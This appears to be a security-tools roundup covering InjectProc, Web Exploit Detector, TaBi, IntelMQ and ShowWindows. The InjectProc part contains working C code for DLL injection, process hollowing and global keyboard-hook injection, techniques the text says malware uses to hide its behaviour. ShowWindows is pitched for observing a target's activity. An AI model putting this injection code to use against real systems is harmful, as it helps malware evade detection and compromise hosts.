
InjectProc - Process Injection Techniques


Process injection is a very popular method of hiding the malicious behavior of code and is heavily used by malware authors.

Several techniques are commonly used: DLL injection, process replacement (a.k.a. process hollowing), hook injection and APC injection.

Most of them use the same Windows API functions: OpenProcess, VirtualAllocEx and WriteProcessMemory; for detailed information about these functions, consult MSDN. A brief illustrative sketch in C follows each technique's list of steps below.

DLL injection:
  • Open target process.
  • Allocate space.
  • Write code into the remote process.
  • Execute the remote code.
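These steps map directly onto well-known Windows API calls. The following is a minimal C sketch of the classic LoadLibrary/CreateRemoteThread variant, shown purely for illustration (it is not taken from InjectProc's source):

// Minimal DLL injection sketch: make the target process call LoadLibraryA
// on a DLL path that we write into its memory.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    if (argc < 3) {
        printf("Usage: %s <pid> <full_path_to_dll>\n", argv[0]);
        return 1;
    }
    DWORD pid = (DWORD)atoi(argv[1]);
    const char *dllPath = argv[2];
    SIZE_T pathLen = strlen(dllPath) + 1;

    // 1. Open the target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) {
        printf("OpenProcess failed (%lu)\n", GetLastError());
        return 1;
    }

    // 2. Allocate space in the remote process for the DLL path
    LPVOID remoteBuf = VirtualAllocEx(hProcess, NULL, pathLen,
                                      MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // 3. Write the DLL path into the remote process
    WriteProcessMemory(hProcess, remoteBuf, dllPath, pathLen, NULL);

    // 4. Execute the remote code: a new thread in the target calls
    //    LoadLibraryA(dllPath), which maps and initialises the DLL there
    LPTHREAD_START_ROUTINE loadLib = (LPTHREAD_START_ROUTINE)GetProcAddress(
        GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, loadLib,
                                        remoteBuf, 0, NULL);

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    VirtualFreeEx(hProcess, remoteBuf, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    return 0;
}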

Process replacement:
  • Create target process and suspend it.
  • Unmap from memory.
  • Allocate space.
  • Write headers and sections into the remote process.
  • Resume remote thread.
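The condensed C sketch below (illustration only, not InjectProc's code) shows the x64 call sequence; it assumes the raw bytes of the payload PE are already loaded into the payload buffer, that the payload's preferred image base is free inside the target, and that no relocations or error handling are needed:

// Condensed x64 process replacement (process hollowing) sketch.
#include <windows.h>

typedef LONG (NTAPI *pNtUnmapViewOfSection)(HANDLE, PVOID);

void hollow(const char *targetExe, unsigned char *payload)
{
    // 1. Create the target process in a suspended state
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    CreateProcessA(targetExe, NULL, NULL, NULL, FALSE,
                   CREATE_SUSPENDED, NULL, NULL, &si, &pi);

    // Parse the payload's PE headers for image base, size and entry point
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)payload;
    PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(payload + dos->e_lfanew);
    LPVOID base = (LPVOID)nt->OptionalHeader.ImageBase;

    // 2. Unmap the original executable image from the suspended process
    pNtUnmapViewOfSection NtUnmapViewOfSection = (pNtUnmapViewOfSection)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
    NtUnmapViewOfSection(pi.hProcess, base);

    // 3. Allocate space for the payload at its preferred base address
    LPVOID remote = VirtualAllocEx(pi.hProcess, base,
                                   nt->OptionalHeader.SizeOfImage,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);

    // 4. Write the PE headers, then each section, into the remote process
    WriteProcessMemory(pi.hProcess, remote, payload,
                       nt->OptionalHeader.SizeOfHeaders, NULL);
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);
    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++)
        WriteProcessMemory(pi.hProcess, (BYTE *)remote + sec->VirtualAddress,
                           payload + sec->PointerToRawData,
                           sec->SizeOfRawData, NULL);

    // Point the suspended main thread at the payload's entry point and patch
    // ImageBaseAddress in the PEB (Rdx holds the PEB address, offset 0x10)
    CONTEXT ctx;
    ctx.ContextFlags = CONTEXT_FULL;
    GetThreadContext(pi.hThread, &ctx);
    ctx.Rcx = (DWORD64)remote + nt->OptionalHeader.AddressOfEntryPoint;
    WriteProcessMemory(pi.hProcess, (LPVOID)(ctx.Rdx + 0x10),
                       &remote, sizeof(remote), NULL);
    SetThreadContext(pi.hThread, &ctx);

    // 5. Resume the remote thread; the loader completes start-up on the payload
    ResumeThread(pi.hThread);
}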

Hook injection:
  • Find/Create process.
  • Set the hook.
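As an illustration (again, not InjectProc's actual code), a global hook set with SetWindowsHookEx causes Windows itself to map the hook DLL into other processes; the DLL name hook_payload.dll and its export HookProc below are hypothetical:

// Hook injection sketch: the DLL exporting the hook procedure is mapped by
// Windows into every GUI process that receives keyboard input.
#include <windows.h>

int main(void)
{
    // Load the DLL that exports the hook procedure (hypothetical names)
    HMODULE hDll = LoadLibraryA("hook_payload.dll");
    HOOKPROC proc = (HOOKPROC)GetProcAddress(hDll, "HookProc");

    // Set a global (thread id 0) keyboard hook; this is what injects the DLL
    HHOOK hHook = SetWindowsHookExA(WH_KEYBOARD, proc, hDll, 0);

    // A message loop keeps the hook installed while this process runs
    MSG msg;
    while (GetMessageA(&msg, NULL, 0, 0) > 0) {
        TranslateMessage(&msg);
        DispatchMessageA(&msg);
    }

    UnhookWindowsHookEx(hHook);
    FreeLibrary(hDll);
    return 0;
}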

APC injection:
  • Open process.
  • Allocate space.
  • Write code into the remote process.
  • "Execute" threads using QueueUserAPC.

Download
Windows x64 binary - 64-bit DEMO

Dependencies:
vc_redist.x64 - Microsoft Visual C++ Redistributable

DEMO


Web Exploit Detector - Tool To Detect Possible Infections, Malicious Code And Suspicious Files In Web Hosting Environments


The Web Exploit Detector is a Node.js application (and NPM module) used to detect possible infections, malicious code and suspicious files in web hosting environments. This application is intended to be run on web servers hosting one or more websites. Running the application will generate a list of files that are potentially infected together with a description of the infection and references to online resources relating to it.

As of version 1.1.0 the application also includes utilities to generate and compare snapshots of a directory structure, allowing users to see if any files have been modified, added or removed.
The application is hosted here on GitHub so that others can benefit from it, as well as allowing others to contribute their own detection rules.

Installation

Regular users
The simplest way to install Web Exploit Detector is as a global NPM module: -
npm install -g web_exploit_detector
If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector).

Updating
The module should be updated regularly to make sure that all of the latest detection rules are present. Running the above command will always download the latest stable (tested) version. To update a version that has already been installed, simply run the following: -
npm update -g web_exploit_detector
Again, you may have to use the sudo command as above.

Technical users
You can also clone the Git repository and run the script directly like so: -
  1. git clone https://github.com/polaris64/web_exploit_detector
  2. cd web_exploit_detector
  3. npm install

Running

From NPM module
If you have installed Web Exploit Detector as an NPM module (see above) then running the scanner is as simple as running the following command, passing in the path to your webroot (location of your website files): -
wed-scanner --webroot=/var/www/html
Other command-line options are available, simply run wed-scanner --help to see a help message describing them.
Running the script in this way will produce human-readable output on the console. This is very useful when running the script with cron, for example, as the output can be sent as an e-mail whenever the script runs.
The script also supports the writing of results to a more computer-friendly JSON format for later processing. To enable this output, see the --output command line argument.

From cloned Git repository
Simply call the script via node and pass the path to your webroot as follows: -
node index.js --webroot=/var/www/html

Recursive directory snapshots
The Web Exploit Detector also comes with two utilities to help to identify files that might have changed unexpectedly. A successful attack on a site usually involves deleting files, adding new files or changing existing files in some way.

Snapshots
A snapshot (as used by these utilities) is a JSON file which lists all files as well as a description of their contents at the time the snapshot was created. If a snapshot was generated on Monday, for example, and the site was attacked on Tuesday, then running a comparison between this snapshot and the current site files afterwards will show that one or more files were added, deleted or changed. The goal of these utilities is therefore to allow these snapshots to be created and the comparisons to be performed when required.
The snapshot stores each file path together with a SHA-256 hash of the file contents. A hash, or digest, is a small summary of a message, which in this case is the file's contents. If the file contents change, even in a very small way, the hash will become completely different. This provides a good way of detecting any changes to file contents.

Usage
The following two utilities are also installed as part of Web Exploit Detector: -
  • wed-generate-snapshot: this utility allows a snapshot to be generated for all files (recursively) in a directory specified by "--webroot". The snapshot will be saved to a file specified in the "--output" option.
  • wed-compare-snapshot: once a snapshot has been generated it can be compared against the current contents of the same directory. The snapshot to check is specified using the "--snapshot" option. The base directory to check against is stored within the snapshot, but if the base directory has changed since the snapshot was generated then the --webroot option can be used.

Workflow
Snapshots can be generated as frequently as required, but as a general rule of thumb they should be generated whenever a site is in a clean (non-infected) state and whenever a legitimate change has been made. For CMS-based sites like WordPress, snapshots should be created regularly, as new uploads will cause the current state to diverge from the stored snapshot. For sites whose files should never change, a single snapshot can be generated and then used indefinitely to ensure nothing actually does change.

Usage as a module
The src/web-exploit-detector.js script is an ES6 module that exports the set of rules (as rules) as well as a number of functions: -
  • executeTests(settings): runs the exploit checker based on the passed settings object. For usage, please consult the index.js script.
  • formatResult(result): takes a single test result from the array returned from executeTests() and generates a string of results ready for output for that test.
  • getFileList(path): returns an array of files from the base path using readDirRecursive().
  • processRulesOnFile(file, rules): processes all rules from the array rules on a single file (string path).
  • readDirRecursive(path): recursive function which returns a Promise which will be resolved with an array of all files in path and sub-directories.
The src/cli.js script is a simple command-line interface (CLI) to this module as used by the wed-scanner script, so reading this script shows one way in which this module can be used.
The project uses Babel to compile the ES6 modules in "src" to plain JavaScript modules in "lib". If you are running an older version of Node.js then modules can be require()'d from the "lib" directory instead.

Building
The package contains Babel as a dev-dependency and the "build" and "watch:build" scripts. When running the "build" script (npm run build), the ES6 modules in "./src" will be compiled and saved to "./lib", where they are included by the CLI scripts.
The "./lib" directory is included in the repository so that any user can clone the repository and run the application directly without having to install dev-dependencies and build the application.

Excluding results per rule
Sometimes rules, especially those tagged with suspicion, will identify a clean file as a potential exploit. Because of this, a system to allow files to be excluded from being checked for a rule is also included.
The wed-results-to-exceptions script takes an output file from the main detector script (see the --output option) and gives you the choice to exclude each file in turn for each specific rule. All excluded files are stored in a file called wed-exceptions.json (in the user's home directory) which is read by the main script before running the scan. If a file is listed in this file then all attached rules (by ID) will be skipped when checking this file.
For usage instructions, simply run wed-results-to-exceptions. You will need to have a valid output JSON from a previous run of the main detector first using the --output option.
For users working directly with the Git repository, run node results_to_exceptions.js in the project root directory.

Rule engine
The application operates using a collection of "rules" which are loaded when the application is run. Each rule consists of an ID, name, description, list of URLs, tags, deprecation flag and most importantly a set of tests.
Each individual test must be one of the following: -
  • A regular expression: the simplest type of test, any value matching the regex will pass the test.
  • A Boolean callback: the callback function must return a Boolean value indicating if the value passes the test. The callback is free to perform any synchronous operations.
  • A Promise callback: the callback function must return a Promise which is resolved with a Boolean value indicating if the value passes the test. This type of callback is free to perform any asynchronous operations.
The following test types are supported: -
  • "path": used to check the file path. This test must exist and should evaluate to true if the file path is considered to match the rule.
  • "content": used to check the contents of a file. This test is optional and file contents will only be read and sent to rules that implement this test type. When this test is a function, the content (string) will be passed as the first argument and the file path will be passed as the second argument, allowing the test to perform additional file operations.

Expanding on the rules
As web-based exploits are constantly evolving and new exploits are being created, the set of rules needs to be updated too. As I host a number of websites I am constantly observing new kinds of exploits, so I will be adding to the set of rules whenever I can. I run this tool on my own servers, so of course I want it to be as functional as possible!
This brings me onto the reasons why I have made this application available as an open-source project: firstly so that you and others can benefit from it and secondly so that we can all collaborate to contribute detection rules so that the application is always up to date.

Contributing rules
If you have discovered an exploit that is not detected by this tool then please either contact me to let me know or even better, write your own rule and add it to the third-party rule-set (rules/third-party/index.js), then send me a pull request.
Don't worry if you don't know how to write your own rules; the most important thing is that the rule gets added, so feel free to send me as much information as you can about the exploit and I will try to create my own rule for it.
Rules are categorised, but the simplest way to add your own rule is to add it to the third-party rule-set mentioned above. Rule IDs are written in the following format: "author:type:sub-type(s):rule-id". For example, one of my own rules is "P64:php:cms:wordpress:wso_webshell". "P64" is me (the author), "php:cms:wordpress" is the grouping (a PHP-specific rule, for the Content Management System (CMS) called WordPress) and "wso_webshell" is the specific rule ID. When writing your own rules, try to follow this format, and replace "P64" with your own GitHub username or other unique ID.

Unit tests and linting
The project contains a set of Jasmine tests which can be run using npm test. It also contains an ESLint configuration, and ESLint can be run using npm run lint.
When developing, tests can also be run whenever a source file changes by running npm run watch:test. To run tests and ESLint, the npm run watch:all script can be used.
Please note that unless you already have Jasmine and/or nodemon installed, you should run npm install in non-production mode to ensure that the dev-dependencies are installed.


TaBi - Track BGP Hijacks


Developed since 2011 for the needs of the French Internet Resilience Observatory, TaBi is a framework that eases the detection of BGP IP prefix conflicts and their classification into BGP hijacking events. The term prefix hijacking refers to an event in which an AS, called the hijacking AS, illegitimately advertises a prefix equal to, or more specific than, a prefix delegated to another AS, called the hijacked AS.

Usually, TaBi processes BGP messages that are archived in MRT files. In order to use it, you will therefore need to install an MRT parser. Its favorite companion is MaBo, but it is also compatible with CAIDA's bgpreader. Internally, TaBi translates BGP messages into its own representation, so it is possible to implement new inputs depending on your needs.

Authors
Building TaBi
TaBi depends on two external Python modules. The easiest method to install them is to use virtualenv and pip.
If you use a Debian-like system you can install these dependencies using:
apt-get install python-dev python-pip python-virtualenv
Then install TaBi in a virtual environment:
virtualenv ve_tabi
source ve_tabi/bin/activate
pip install py-radix python-dateutil
python setup.py install
Removing TaBi and its dependencies is therefore as simple as removing the cloned repository.
Usage
Historically TaBi was designed to process MRT dump files from the collectors of the RIPE RIS.
Grabbing MRT dumps
You will then need to retrieve some MRT dumps. Copying and pasting the following commands in a terminal will grab a full BGP view and some updates.
wget -c http://data.ris.ripe.net/rrc01/2016.01/bview.20160101.0000.gz
wget -c http://data.ris.ripe.net/rrc01/2016.01/updates.20160101.0000.gz

tabi - the command line tool
The tabi command is the legacy tool that uses TaBi to build technical indicators for the Observatory reports. It uses mabo to parse MRT dumps.
Given the name of the BGP collector, an output directory and MRT dumps using the RIS naming convention, tabi will follow the evolution of the routes seen in the MRT dumps (or provided with the --ases option), and detect BGP IP prefix conflicts.
Several options can be used to control tabi behavior:
$ tabi --help
Usage: tabi [options] collector_id output_directory filenames*

Options:
  -h, --help            show this help message and exit
  -f, --file            files content comes from mabo
  -p PIPE, --pipe=PIPE  Read the MRT filenames used as input from this pipe
  -d, --disable         disable checks of the filenames RIS format
  -j JOBS, --jobs=JOBS  Number of jobs that will process the files
  -a ASES, --ases=ASES  File containing the ASes to monitor
  -s, --stats           Enable code profiling
  -m OUTPUT_MODE, --mode=OUTPUT_MODE
                        Select the output mode: legacy, combined or live
  -v, --verbose         Turn on verbose output
  -l, --log             Messages are written to a log file.
Among these options, two are particularly interesting:
  • -j that forks several tabi processes to process the MRT dumps faster
  • -a that can be used to limit the output to a limited list of ASes
Note that the legacy output mode will likely consume all file descriptors as it creates two files per processed AS (i.e. around 100k opened files). The default is the combined output mode.
Here is an example call to tabi:
tabi -j 8 rrc01 results/ bview.20160101.0000.gz updates.20160101.0000.gz
After around 5 minutes of processing, you will find the following files in results/2016.01/:
  • all.defaults.json.gz that contains all default routes seen by TaBi
  • all.routes.json.gz that contains all routes monitored
  • all.hijacks.json.gz that contains all BGP prefix conflicts
Using TaBi as a Python module
TaBi can also be used as a regular Python module, so that you can integrate it into your own tools.
The example provided in this repository enhances BGP prefix conflict detection with a possible hijack classification. To do so, it relies on external data sources such as RPKI ROAs, route objects and other IRR objects.


IntelMQ - A solution for IT security teams for collecting and processing security feeds using a message queuing protocol


IntelMQ is a solution for IT security teams (CERTs, CSIRTs, abuse departments, ...) for collecting and processing security feeds (such as log files) using a message queuing protocol. It is a community-driven initiative called IHAP (Incident Handling Automation Project), which was conceptually designed by European CERTs/CSIRTs during several InfoSec events. Its main goal is to give incident responders an easy way to collect and process threat intelligence, thus improving the incident handling processes of CERTs.

IntelMQ's design was influenced by AbuseHelper; however, it was re-written from scratch and aims to:
  • Reduce the complexity of system administration
  • Reduce the complexity of writing new bots for new data feeds
  • Reduce the probability of events being lost at any stage of processing, thanks to persistence functionality (even in the case of a system crash)
  • Use and improve the existing Data Harmonization Ontology
  • Use JSON format for all messages
  • Integrate the existing tools (AbuseHelper, CIF)
  • Provide an easy way to store data in log collectors like ElasticSearch, Splunk and databases (such as PostgreSQL)
  • Provide an easy way to create your own blacklists
  • Provide easy communication with other systems via an HTTP RESTful API
It follows these basic meta-guidelines:
  • Don't break simplicity - KISS
  • Keep it open source - forever
  • Strive for perfection while keeping a deadline
  • Reduce complexity/avoid feature bloat
  • Embrace unit testing
  • Code readability: test with inexperienced programmers
  • Communicate clearly


Table of Contents
  1. How to Install
  2. Developers Guide
  3. IntelMQ Manager
  4. Incident Handling Automation Project
  5. Data Harmonization
  6. How to Participate
  7. Licence


How to Install


Developers Guide


IntelMQ Manager
Check out this graphical tool and easily manage an IntelMQ system.


Incident Handling Automation Project


Data Harmonization
IntelMQ uses the Data Harmonization. Check the following document.


How to participate

[ShowWindows v1.0] Command-line Tool to Manage Open Windows


Show Windows is a command-line tool to manage the windows opened by all of the processes running on your system.

In addition to showing open windows, it can do a little more. Here are some of the things that you can do with ShowWindows:
  • View all open Windows/Apps
  • Windows opened by particular User
  • Windows opened by particular Process
  • Search for Windows with specified Title
  • Close the Window
  • Kill the selected Process


In a penetration testing environment, it can help you to discover all kinds of activities happening on the target system. Instead of a plain listing of running processes, the list of open windows can reveal more interesting details: for example, which files are currently opened by the user, what songs/videos are being played, what websites are being viewed, etc.


'Show Windows' is available in both 32-bit & 64-bit versions. It works on all Windows platforms from Windows XP to the latest version, Windows 8.

Examples of ShowWindows
//Show all open windows
ShowWindows.exe

//List all open windows belonging to process id 1000
ShowWindows.exe -p 1000

//List all open windows belonging to user admin
ShowWindows.exe -u "admin"

//Close the Window with title 'Mozilla Firefox'
ShowWindows.exe -c "Mozilla Firefox"

//Kill the Process with PID 1000
ShowWindows.exe -k 1000

//List all open Windows having title Chrome
ShowWindows.exe -s "chrome"


Download ShowWindows 
License : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win8
More info